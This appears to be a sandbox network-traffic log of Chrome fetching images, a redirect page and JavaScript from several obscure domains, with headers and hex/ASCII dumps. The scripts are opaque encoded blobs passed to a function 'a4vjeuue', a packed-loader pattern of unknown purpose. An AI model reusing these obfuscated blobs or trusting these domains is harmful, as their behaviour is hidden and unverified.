                                                                                                                                                          2024-06-09 22:41:14 UTC2824INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 52 6c 77 46 30 41 61 41 62 77 41 6b 42 57 43 41 4e 51 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 64 6b 6b 41 4a 52 6b 41 76 69 51 43 79 75 4d 51 45 45 6d 72 44 74 7a 53 39 2b 4a 54 6b 49 42 45 7a 4a 43 41 41 45 53 64 67 43 64 4f 48 4e 51 47 34 41 38 6d 41 42 57 49 44 67 44 6f 41 4a 69 45 61 63 30 49 41 41 72 36 55 45 45 50 76 59 42 50 54 42 41 53 4e 51 42 39 45 4a 41 6b 4d 52 52 37 5a 67 41 62 45 44 56 79 41 44 63 6f 57 4f 59 51 65 67 42 43 41 41 5a 68 41 52 4d 55 2f 56 30 41 58 6b 35 4d 4e 57 79 59 43 45 59 31 41 52 49 30 59 72 49 30 4b 41 42 62 44 4c 55 75 43 43 51 41 47 55 34 39 52 50 73 6f 64 69 68 5a 4e 69 34 65 49 58 30 51 64 6d
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnARlwF0AaAbwAkBWCANQC4AzAVzRgBcBLdTdkkAJRkAviQCyuMQEEmrDtzS9+JTkIBEzJCAAESdgCdOHNQG4A8mABWIDgDoAJiEac0IAAr6UEEPvYBPTBASNQB9EJAkMRR7ZgAbEDVyADcoWOYQegBCAAZhARMU/V0AXk5MNWyYCEY1ARI0YrI0KABbDLUuCCQAGU49RPsodihZNi4eIX0Qdm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          437192.168.2.55020423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC369OUTGET /pc/image-pc/video/gc_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC603INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 25956
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-6564"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[38],EU-GER-frankfurt-EDGE4-CACHE2[36,TCP_MISS,38],EU-FRA-paris-GLOBAL1-CACHE15[25],EU-FRA-paris-GLOBAL1-CACHE1[0,TCP_HIT,23],1.1 google
                                                                                                                                                          X-CCDN-Expires: 494140
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ecc17979ceadded3708695fa6e2a334c
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC15781INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:14 UTC10175INData Raw: 24 fc d5 59 d8 b6 b2 81 b6 ab 86 e3 d8 18 b6 dd 96 fd ad ae d3 6d 93 dc 52 00 14 a5 0d 78 70 e7 a3 b1 26 df 1d 9c d4 76 6c 3b 3e 78 c5 ad 4c f6 bc f6 f7 6e 60 30 cb 9c 93 40 b2 a2 28 3e cf 5d 2a 4c 58 9d ae 68 35 ce 96 35 b6 94 a5 59 a6 4f 73 2b 66 3a d4 a7 5d 49 0b 29 2a 21 20 f0 24 0f 43 af 79 11 28 1b b4 14 a4 cc c9 98 ed 4e b4 dd 1b 07 c8 2e af a5 6e a1 c4 97 d4 54 b7 14 0a 97 c4 fe 2a 9a 73 d3 de 7c 48 a6 c4 69 4f 26 24 8c 6e e7 53 e3 5b 26 e0 37 4b 74 e8 b6 e5 05 39 f3 b2 18 88 1d 0d d3 b6 a9 4e a1 a4 a8 fa 10 3a f4 85 c9 57 53 27 b0 53 73 62 48 b3 28 1a a9 61 f4 6b 4e 10 e4 39 16 43 12 5a 34 71 85 a5 d4 1f f3 24 83 c6 be 87 43 b8 04 10 7a 1a a2 c7 2b 43 2a ca bf 59 58 1f c9 53 a4 3b bd ae f7 6a 33 6e 12 db 6e 43 08 28 0d f5 25 1d 05 22 b4 29 27 a8
                                                                                                                                                          Data Ascii: $YmRxp&vl;>xLn`0@(>]*LXh55YOs+f:]I)*! $Cy(N.nT*s|HiO&$nS[&7Kt9N:WS'SsbH(akN9CZ4q$Cz+C*YXS;j3nnC(%")'


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          438192.168.2.55020690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC401OUTGET /fiximg/ac-20200404/fileupload/ll12/202312/202312222129050.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC534INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 8664
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[2],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE5[10],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,4],1.1 google
                                                                                                                                                          X-CCDN-Expires: 790123
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 2f8afff8478620d44c8b65bd29cabbc6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 5
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC8664INData Raw: 75 39 6d 45 50 55 47 69 48 6c 45 6d 54 43 67 74 46 76 45 6e 33 6e 38 62 30 35 50 6f 45 74 53 56 61 78 50 4b 61 52 53 6e 34 35 4e 43 56 74 61 39 66 58 78 63 62 2b 70 2b 44 54 38 71 71 6a 78 53 2b 65 4d 36 73 79 71 35 6b 39 41 4f 32 39 4c 51 63 31 53 32 42 4c 59 77 47 49 75 35 58 51 32 77 34 34 30 4b 47 4a 7a 46 4a 39 43 39 55 54 45 49 35 38 76 46 35 6d 52 54 79 63 61 4a 57 4c 6b 62 62 52 59 74 73 74 42 6e 42 37 31 61 73 62 74 4a 2b 46 44 49 6f 34 47 75 71 61 7a 78 6f 47 73 64 67 46 65 6a 6d 2b 6a 4b 6e 2f 74 4f 77 6a 6f 64 6d 6d 31 6f 50 32 78 6c 37 36 46 59 7a 44 72 45 2f 33 78 76 73 62 51 34 78 45 41 37 73 6c 41 61 4e 48 72 67 41 79 43 38 42 4a 6f 47 34 71 70 52 6c 49 4b 42 4b 34 57 39 36 31 41 66 51 67 41 36 75 41 74 50 4c 30 59 2b 4f 36 30 34 35 4b 50
                                                                                                                                                          Data Ascii: u9mEPUGiHlEmTCgtFvEn3n8b05PoEtSVaxPKaRSn45NCVta9fXxcb+p+DT8qqjxS+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkbbRYtstBnB71asbtJ+FDIo4GuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KP


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          439192.168.2.55019638.174.148.164434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC633OUTGET / HTTP/1.1
                                                                                                                                                          Host: 43370d.top
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:14 UTC34INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: no-cache,no-store
                                                                                                                                                          2024-06-09 22:41:14 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                                                                          2024-06-09 22:41:14 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:14 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                                                                          2024-06-09 22:41:14 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:41:14 UTC5INData Raw: 35 38 30 0d 0a
                                                                                                                                                          Data Ascii: 580
                                                                                                                                                          2024-06-09 22:41:14 UTC1415INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 32 3b 75 72 6c 3d 2f 3f 5f 5f 43 42 4b 3d 33 32 35 32 63 63 66 34 31 63 35 63 62 31 61 36 32 32 62 32 65 37 65 38 33 65 38 33 35 65 34 30 34 31 37 31 37 39 37 32 38 37 35 5f 31 32 31 33 37 35 30 30 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2e 73 6b 2d 74 68 72 65 65 2d 62 6f 75 6e 63 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f 3b 0a 09 77 69 64 74 68 3a 20 38
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="refresh" content="2;url=/?__CBK=3252ccf41c5cb1a622b2e7e83e835e4041717972875_12137500" /><style type="text/css">.sk-three-bounce {position: absolute;top: 50%;left: 50%;margin: 40px auto;width: 8


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          440192.168.2.55020923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC554OUTGET /pc/240516-03/static/js/components/382/logo.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2452
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:38 GMT
                                                                                                                                                          ETag: "6645cabe-994"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE4[2],EU-FRA-paris-GLOBAL1-CACHE5[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473795
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 015042fe0bc1a1db4661fbda60930c7f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118205
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC2452INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 42 6e 77 48 59 42 64 41 47 67 47 38 41 56 4d 41 45 77 44 59 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 30 37 49 67 41 6c 42 51 43 2b 5a 54 76 68 6f 74 32 58 58 6d 6e 36 43 79 55 45 51 43 4a 57 53 45 41 41 49 6b 6e 41 45 37 63 75 71 67 4e 77 42 35 4d 41 43 73 51 58 41 48 53 30 51 7a 62 6d 68 41 41 46 50 53 67 67 67 39 6e 41 4a 36 59 51 5a 4b 6f 41 2b 6b 45 67 53 41 43 79 4b 4c 53 73 41 44 59 67 71 70 51 41 62 6c 41 78 72 43 43 4d 41 49 54 34 6f 6b 4c 47 79 58 70 61 4b 41 43 38 55 4a 69 71 2b 44 41 51 7a 4b 70 43 5a 45 67 6c 5a 66 6a 63 4c 67 41 57 4e 57 51 78 4a 54 59 4b 53 4c 58 63 44 61 6f 41 39 49 6b 41 34 67 41 73 37 58 70 64 43 74
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjABnwHYBdAGgG8AVMAEwDYAuAMwFc0YAXAS3U07IgAlBQC+ZTvhot2XXmn6CyUEQCJWSEAAIknAE7cuqgNwB5MACsQXAHS0QzbmhAAFPSggg9nAJ6YQZKoA+kEgSACyKLSsADYgqpQAblAxrCCMAIT4okLGyXpaKAC8UJiq+DAQzKpCZEglZfjcLgAWNWQxJTYKSLXcDaoA9IkA4gAs7XpdCt


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          441192.168.2.55020590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC387OUTGET /pc/image-pc/index/312/parner/argentina_logo.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 7800
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:55 GMT
                                                                                                                                                          ETag: "5d71fe87-1e78"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE10[3],EU-FRA-paris-GLOBAL1-CACHE11[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465111
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 778a28bddb8b471e1963c239ac9214ef
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126893
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC7800INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 43 08 06 00 00 00 da b4 86 e8 00 00 1e 3f 49 44 41 54 68 43 bd 9a 07 78 55 55 ba f7 7f bb 9d 7e 4e 0a e9 09 24 84 0e 21 44 8a 74 e9 06 14 41 45 1c b9 96 6b ef 3a 8a 33 28 2a df bd d7 ee e8 55 e7 3a a8 a0 63 bb 96 11 7b c7 91 2e 4a 11 91 1e 48 28 09 a4 f7 73 72 fa d9 7b af ef d9 27 e2 55 47 e6 c2 cc f7 7c eb 79 f2 ec b3 77 d6 7a d7 fb 7f fb bb f6 96 f8 27 47 c1 d8 db d3 2d 12 b5 9b 9e 6c 3f 15 52 83 c7 ce 4f df b7 e9 ed 53 5a f3 6b f4 a5 53 d9 f4 d7 e6 0e 98 70 d5 fd 98 66 d7 81 6f 5e fa c3 c9 d2 ea 5b 32 7d 72 46 66 de 65 9b d7 be 7a e5 c9 ae 39 d1 bc 7f 1a c0 e8 e9 17 b6 69 9a d6 b2 f1 f3 d7 07 9e 2c 33 65 13 17 2c f2 7a bd 8f 7e f5 d9 f2 7f 7a ff 7f 9a c0 bf df 7f 9b 90 24 89 7f bb f7
                                                                                                                                                          Data Ascii: PNGIHDR0C?IDAThCxUU~N$!DtAEk:3(*U:c{.JH(sr{'UG|ywz'G-l?ROSZkSpfo^[2}rFfez9i,3e,z~z$


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          442192.168.2.55021823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC555OUTGET /pc/240516-03/static/js/components/382/login.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 7916
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:38 GMT
                                                                                                                                                          ETag: "6645cabe-1eec"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[4],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE22[4],EU-FRA-paris-GLOBAL1-CACHE8[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473795
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ac0f9d50c0dbca48ff592794731189af
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118205
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC7916INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 46 67 41 34 42 64 41 47 67 47 38 41 69 41 56 67 46 55 41 76 41 65 6b 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 68 43 6b 65 70 4e 41 45 6f 71 48 4a 43 41 41 45 53 48 67 43 63 2b 76 53 67 47 34 41 38 6d 41 42 57 49 58 67 44 6f 41 4a 69 44 5a 38 30 49 41 41 71 4b 55 45 45 49 70 34 42 50 54 4b 4d 6f 42 39 56 79 43 51 42 5a 46 49 59 34 41 62 45 45 6f 4b 41 44 63 6f 66 77 34 51 46 67 42 43 41 41 59 41 58 33 45 31 4d 4d 56 5a 4b 41 42 65 4e 45 78 4b 41 42 46 44 51 6d 42 4b 63 56 49 55 54 50 30 73 71 47 4b 2b 54 4f 7a 59 6d 41 67 32 49 74 4a 46 47 73 6f 41 4f 51 42 4e 41 41 38 4e 4a 71 52 30 7a 42 52 4d 63 55 78 79 65 4e 49 74 58 56 35 4d
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAFgA4BdAGgG8AiAVgFUAvAekoC4AzAVzRgBcBLdJhCkepNAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp4BPTKMoB9VyCQBZFIY4AbEEoKADcofw4QFgBCAAYAX3E1MMVZKABeNExKABFDQmBKcVIUTP0sqGK+TOzYmAg2ItJFGsoAOQBNAA8NJqR0zBRMcUxyeNItXV5M


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          443192.168.2.55021490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC568OUTGET /pc/240516-03/static/js/components/383/footerCopyRight.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 824
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:39 GMT
                                                                                                                                                          ETag: "6645cabf-338"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[4],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE23[4],EU-FRA-paris-GLOBAL1-CACHE21[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467544
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b8a9078acf00a55c9ac76d898c8f1d55
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124456
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
